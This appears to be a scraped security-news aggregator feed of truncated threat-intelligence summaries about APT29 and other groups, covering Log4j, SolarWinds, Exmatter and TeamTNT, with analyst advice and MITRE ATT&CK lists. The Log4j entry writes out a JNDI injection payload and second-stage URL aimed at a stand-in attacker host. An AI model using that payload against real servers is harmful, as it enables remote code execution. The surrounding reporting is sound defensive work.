Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow]]> 2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more www.secnews.physaphae.fr/article.php?IdArticle=3999162 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Guideline APT 41,APT 38,APT 29,APT 28,APT 28 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 37,APT 29,APT 15,APT 15,APT 25 None Security Affairs - Blog Secu 2021-12-07T07:54:37+00:00 https://securityaffairs.co/wordpress/125352/apt/nobelium-custom-malware.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-custom-malware www.secnews.physaphae.fr/article.php?IdArticle=3755876 False Malware,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild. Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so]]> 2021-11-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more www.secnews.physaphae.fr/article.php?IdArticle=3598623 False Ransomware,Malware,Tool,Threat,Guideline APT 29,APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report (published: October 7, 2021) Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%). Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions. MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110 Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran Ransomware in the CIS (published: October 7, 2021) Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto]]> 2021-10-12T17:41:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-aerospace-and-telecoms-targeted-by-iranian-malkamak-group-cozy-bear-refocuses-on-cyberespionage-wicked-panda-is-traced-by-malleable-c2-profiles-and-more www.secnews.physaphae.fr/article.php?IdArticle=3505382 False Ransomware,Malware,Tool,Threat,Guideline,Prediction APT 41,APT 41,APT 39,APT 29,APT 29,APT 28 None SecurityWeek - Security News 2021-07-30T15:25:25+00:00 http://feedproxy.google.com/~r/securityweek/~3/fj3gvAcPmps/russias-apt29-still-actively-delivering-malware-used-covid-19-vaccine-spying www.secnews.physaphae.fr/article.php?IdArticle=3152083 False Malware APT 29,APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2021-07-30T03:00:54+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/OGQmE6b-OF4/experts-uncover-several-c-servers.html www.secnews.physaphae.fr/article.php?IdArticle=3150978 False Malware,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations (published: June 4, 2021) Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP. Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts. MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069 Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates Necro Python Bots Adds New Tricks (published: June 3, 2021) Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms. Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover. MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219 Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig New SkinnyBoy Ma]]> 2021-06-08T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-teamtnt-actively-enumerating-cloud-environments-to-infiltrate-organizations-necro-python-bots-adds-new-tricks-us-seizes-domains-used-by-apt29-and-more www.secnews.physaphae.fr/article.php?IdArticle=2890622 False Ransomware,Malware,Vulnerability,Threat,Patching,Guideline APT 29,APT 28 None Bleeping Computer - Magazine Américain 2021-06-01T16:56:57+00:00 https://www.bleepingcomputer.com/news/security/us-seizes-domains-used-by-apt29-in-recent-usaid-phishing-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=2865812 False Malware APT 29 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this agazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Darkside Ransomware Caused Major US Pipeline Shutdown (published: May 8, 2021) DarkSide ransomware attack caused Colonial Pipeline to shut down the biggest US gasoline pipeline on Friday, May 7th, 2021. The pipeline is the main source of gasoline, diesel and jet fuel for the US East Coast and runs from Texas to Tennessee and New Jersey serving up to 50 Million people. DarkSide group began their attack against the company a day earlier, stealing nearly 100 gigabytes of data before locking computers with ransomware and demanding payment. Analyst Comment: While DarkSide's first known activity goes back only to August 2020, it is likely backed by experienced Eastern-European actors. Ransomware protection demands a multi-layered approach to include isolation, air-gaps, backup solutions, anti-phishing training and detection. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490 | [MITRE ATT&CK] Scripting - T1064 Tags: DarkSide, ransomware, Oil and Gas, USA, Colonial Pipeline Revealing The 'Cnip3' Crypter, A Highly Evasive RAT Loader (published: May 7, 2021) Morphisec has discovered a new stealthy crypter as a service dubbed Snip3. Its advanced anti-detection techniques include: 1) Executing PowerShell code with the ‘remotesigned’ parameter. 2) Validating the existence of Windows Sandbox and VMWare virtualization. 3) Using Pastebin and top4top for staging. 4) Compiling RunPE loaders on the endpoint in runtime. Several hackers were observed using Snip3 to deliver various payloads: AsyncRAT, NetWire RAT, RevengeRAT, and Agent Tesla. Analyst Comment: The Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing detection-centric solutions. It shows the value of investing in complex cybersecurity solutions. MITRE ATT&CK: [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Process Injection - T1055 Tags: Snip3, crypter, Crypter-as-a-Service, VBS, RAT, AsyncRAT, NetWire RAT, RevengeRAT, Agent Tesla, NYANxCAT Lemon Duck target Microsoft Exchange Servers, Incorporate New TTPs (published: May 7, 2021) The Lemon Duck cryptomining group has been active since at least]]> 2021-05-12T21:55:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-ttps-darkside-ransomware-shuts-down-us-pipeline-operation-tunnelsnake-uses-new-moriya-rootkit-and-more www.secnews.physaphae.fr/article.php?IdArticle=2776510 False Ransomware,Malware,Threat APT 29,APT 29 None Anomali - Firm Blog get signed up today so you can receive curated and summarized cybersecurity intelligence events weekly. The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Emotet, Go, Masslogger, Mustang Panda, OilRig, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact (published: February 26, 2021) Recent reporting indicates that two prolific cybercrime threat groups, CARBON SPIDER and SPRITE SPIDER, have begun targeting ESXi, a hypervisor developed by VMWare to run and manage virtual machines. SPRITE SPIDER uses PyXie's LaZagne module to recover vCenter credentials stored in web browsers and runs Mimikatz to steal credentials from host memory. After authenticating to vCenter, SPRITE SPIDER enables ssh to permit persistent access to ESXi devices. In some cases, they also change the root account password or the host’s ssh keys. Before deploying Defray 777, SPRITE SPIDER’s ransomware of choice, they terminate running VMs to allow the ransomware to encrypt files associated with those VMs. CARBON SPIDER has traditionally targeted companies operating POS devices, with initial access being gained using low-volume phishing campaigns against this sector. But throughout 2020 they were observed shifting focus to “Big Game Hunting” with the introduction of the Darkside Ransomware. CARBON SPIDER gains access to ESXi servers using valid credentials and reportedly also logs in over ssh using the Plink utility to drop the Darkside Recommendation: Both CARBON SPIDER and SPRITE SPIDER likely intend to use ransomware targeting ESXi to inflict greater harm – and hopefully realize larger profits – than traditional ransomware operations against Windows systems. Should these campaigns continue and prove to be profitable, we would expect more threat actors to imitate these activities. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Scheduled Transfer - T1029 | ]]> 2021-03-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt-groups-cobalt-strike-russia-malware-and-more www.secnews.physaphae.fr/article.php?IdArticle=2422682 False Ransomware,Malware,Threat Wannacry,Wannacry,APT 29,APT 28,APT 31,APT 34 None Anomali - Firm Blog state-sponsored adversary. In the case of SolarWinds, it is looking like an adversary was able to dwell in victims’ networks for as long as nine months and that the prime suspect is the Kremlin. There are undoubtedly many organizations wondering if they are caught up in the attacks, either by design or indirectly. Fortunately, those that have effective threat detection capabilities in place can utilize the information FireEye, SolarWinds, Anomali and other threat research organizations are providing to determine if they’ve been hit. Anomali customers are already ahead of the game. As soon as the world becomes aware of an attack, Anomali Threat Research immediately front-loads Anomali ThreatStream with a threat bulletin that provides a detailed and concise narrative of the situation along with a comprehensive list of the known indicators of compromise (IOCs). Once added, information relevant to the incident (IOCs, reports from the security community, signatures, etc.) are automatically delivered to customers. This gives them the ability to automate threat detection and blocking across their security controls, including EDR, firewalls, and SIEM. In addition, customers using Anomali Match, our threat detection and response product, are able to use the threat intelligence to do a retrospective search back to when the threat was active, getting real-time results showing whether the threat was seen in their network at that time. To provide threat intelligence and security operations analysts with a look at what an Anomali threat bulletin looks like, we’ve added the first version of the FireEye threat bulletin to this blog. We are happy to discuss more deeply how Anomali customers are using this information and continual updates to detect the presence of related IOCs in their environments. Reach us at general@anomali.com. To listen to a more in-depth conversation on the incident and how threat intelligence aids in detection, listen to this week’s Anomali Detect Podcast. Key Findings Unknown, sophisticated actors stole more than 300 FireEye Red Team tools and countermeasures (signatures) on an unspecified date. An unnamed source for The Washington Post claimed Cozy Bear (APT29), is responsible, but provided no evidence. Actor(s) were also interested in FireEye customers, specifically, government entities. The Red Team countermeasures consisted of custom-versions of known tools, a prioritized Common Vulnerabilities and Exposures (CVE) list, and malware signatures in ClamAV, HXIOC, Snort, and Yara languages. The stolen tools could be customized by actors, just as the FireEye Red Team did to existing tools. ]]> 2020-12-17T18:00:00+00:00 https://www.anomali.com/blog/fireeye-solarwinds-hacks-show-that-detection-is-key-to-solid-defense www.secnews.physaphae.fr/article.php?IdArticle=2108493 False Malware,Threat,Guideline APT 29 None Mandiant - Blog Sécu de Mandiant fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. Résumé de l'exécutif Nous avons découvert une campagne mondiale d'intrusion.Nous suivons les acteurs derrière cette campagne sous le nom de UNC2452. Fireeye a découvert une attaque de chaîne d'approvisionnement trrojanisant les mises à jour de logiciels commerciaux de Solarwinds Orion afin de distribuer des logiciels malveillants que nous appelons Sunburst. L'activité post-compromis de l'attaquant exploite plusieurs techniques pour échapper à la détection et obscurcir leur activité, mais ces efforts offrent également quelques opportunités de détection. le

---

UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. Executive Summary We have discovered a global intrusion campaign. We are tracking the actors behind this campaign as UNC2452. FireEye discovered a supply chain attack trojanizing SolarWinds Orion business software updates in order to distribute malware we call SUNBURST.  The attacker\'s post compromise activity leverages multiple techniques to evade detection and obscure their activity, but these efforts also offer some opportunities for detection. The]]> 2020-12-13T22:00:00+00:00 https://www.mandiant.com/resources/blog/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8377613 False Malware Solardwinds,APT 29 3.0000000000000000 IT Security Guru - Blog Sécurité 2019-10-18T10:13:01+00:00 https://www.itsecurityguru.org/2019/10/18/russian-hackers-noticed-after-being-undetected-for-years/?utm_source=rss&utm_medium=rss&utm_campaign=russian-hackers-noticed-after-being-undetected-for-years www.secnews.physaphae.fr/article.php?IdArticle=1410802 True Malware,Threat APT 29 None Bleeping Computer - Magazine Américain 2019-10-17T09:39:47+00:00 https://www.bleepingcomputer.com/news/security/cozy-bear-russian-hackers-spotted-after-staying-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=1409160 False Malware,Threat APT 29 None We Live Security - Editeur Logiciel Antivirus ESET 2019-10-17T09:30:46+00:00 http://feedproxy.google.com/~r/eset/blog/~3/ThDiJoYnG-U/ www.secnews.physaphae.fr/article.php?IdArticle=1408711 False Malware APT 29 None Security Affairs - Blog Secu 2018-11-23T10:38:04+00:00 https://securityaffairs.co/wordpress/78353/apt/new-cozy-bear-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=913703 False Malware APT 29 None Security Affairs - Blog Secu 2018-11-19T13:27:04+00:00 https://securityaffairs.co/wordpress/78195/apt/apt29-malware-analysis.html www.secnews.physaphae.fr/article.php?IdArticle=906670 False Malware APT 29 None